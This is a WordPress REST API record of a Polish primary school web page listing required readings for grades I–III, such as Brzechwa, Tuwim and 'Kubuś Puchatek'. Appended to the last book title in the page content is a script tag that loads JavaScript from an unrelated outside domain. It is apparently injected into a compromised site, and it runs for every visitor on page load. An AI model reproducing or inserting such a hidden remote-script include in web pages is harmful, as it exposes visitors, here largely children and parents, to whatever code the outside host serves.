{"id":52,"date":"2015-12-15T13:41:32","date_gmt":"2015-12-15T12:41:32","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=52"},"modified":"2020-04-23T09:21:30","modified_gmt":"2020-04-23T07:21:30","slug":"lektury-kl-i-iii","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/lektury-kl-i-iii\/","title":{"rendered":"Lektury kl. I-III"},"content":{"rendered":"<p><span style=\"color: #0000ff;\"><strong>LEKTURY KLASY I<\/strong><\/span><\/p>\n<p>Be\u0142za W\u0142adys\u0142aw &#8211; \u201eKto ty jeste\u015b? Polak ma\u0142y!\u201d<\/p>\n<p>Brzechwa Jan -\u201dBrzechwa dzieciom\u201d<\/p>\n<p>Januszewska Hanna &#8211; \u201eKopciuszek\u201d<\/p>\n<p>Janczarski Czes\u0142aw &#8211; \u201eJak Wojtek zosta\u0142 stra\u017cakiem\u201d<\/p>\n<p>Kownacka Maria &#8211; \u201ePlastusiowy pami\u0119tnik\u201d<\/p>\n<p>Micha\u0142kow &#8211; \u201eNie p\u0142acz kozio\u0142ku\u201d<\/p>\n<p>Szelburg \u2013 Zar\u0119bina Ewa &#8211; \u201eNajmilsi\u201d<\/p>\n<p>Tuwim Julian &#8211; \u201eWiersze dla dzieci\u201d<\/p>\n<p>Wawi\u0142ow Danuta &#8211; \u201eWierszykarnia\u201d<\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<p><span style=\"color: #0000ff;\"><strong>LEKTURY KLASY II<\/strong><\/span><\/p>\n<p>Andersen Hans Christian &#8211; \u201eDzieci\u0119 elf\u00f3w\u201d<\/p>\n<p>Brzechwa Jan &#8211; \u201e100 bajek\u201d lub \u201eBrzechwa dzieciom\u201d<\/p>\n<p>Centkiewicz Alina i Czes\u0142aw &#8211; \u201eZaczarowana zagroda\u201d<\/p>\n<p>Kr\u00fcger Maria &#8211; \u201eKarolcia\u201d<\/p>\n<p>Milne Alan Aleksander &#8211; \u201eKubu\u015b Puchatek\u201d<\/p>\n<p>Szelburg \u2013 Zar\u0119bina Ewa &#8211; \u201eIdzie niebo ciemn\u0105 noc\u0105\u201d<\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<p><span style=\"color: #0000ff;\"><strong>LEKTURY KLASY III<\/strong><\/span><\/p>\n<p>P. Ber\u0119sewicz &#8211; \u201eCzy wojna jest dla dziewczyn?\u201d<\/p>\n<p>Nela &#8211; \u201e\u015aladami Neli. Perzez d\u017cungl\u0119, morza i oceany\u201d<\/p>\n<p>B. Tylicka &#8211; \u201ePolskie miasta w ba\u015bniach i legendach\u201d<\/p>\n<p>B. Gawryluk &#8211; \u201eMali\u00a0 bohaterowie\u201d<\/p>\n<p>A. Fr\u0105czek &#8211; \u201eDobre obyczaje, czyli w lekkim tonie o bon tonie\u201d<\/p>\n<p>R. Pi\u0105tkowska &#8211; \u201eZ przys\u0142owiami za pan brat\u201d<\/p>\n<p>D. Sumi\u0144ska &#8211; \u201eDlaczego oczy kota \u015bwiec\u0105 w nocy\u201d<\/p>\n<p>E. Zubrzycka &#8211; \u201eMarudek i Pogodek na wakacjach\u201d<\/p>\n<p>M. Wojciechowska &#8211; \u201eDzieciaki \u015bwiata\u201d<script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>LEKTURY KLASY I Be\u0142za W\u0142adys\u0142aw &#8211; \u201eKto ty jeste\u015b? Polak ma\u0142y!\u201d Brzechwa Jan -\u201dBrzechwa dzieciom\u201d Januszewska Hanna &#8211; \u201eKopciuszek\u201d Janczarski Czes\u0142aw &#8211; \u201eJak Wojtek zosta\u0142 stra\u017cakiem\u201d Kownacka Maria &#8211; \u201ePlastusiowy pami\u0119tnik\u201d Micha\u0142kow &#8211; \u201eNie p\u0142acz kozio\u0142ku\u201d Szelburg \u2013 Zar\u0119bina Ewa &#8211; \u201eNajmilsi\u201d Tuwim Julian &#8211; \u201eWiersze dla dzieci\u201d Wawi\u0142ow Danuta &#8211; \u201eWierszykarnia\u201d \u00a0 LEKTURY KLASY [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/52"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=52"}],"version-history":[{"count":7,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/52\/revisions"}],"predecessor-version":[{"id":15052,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/52\/revisions\/15052"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=52"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}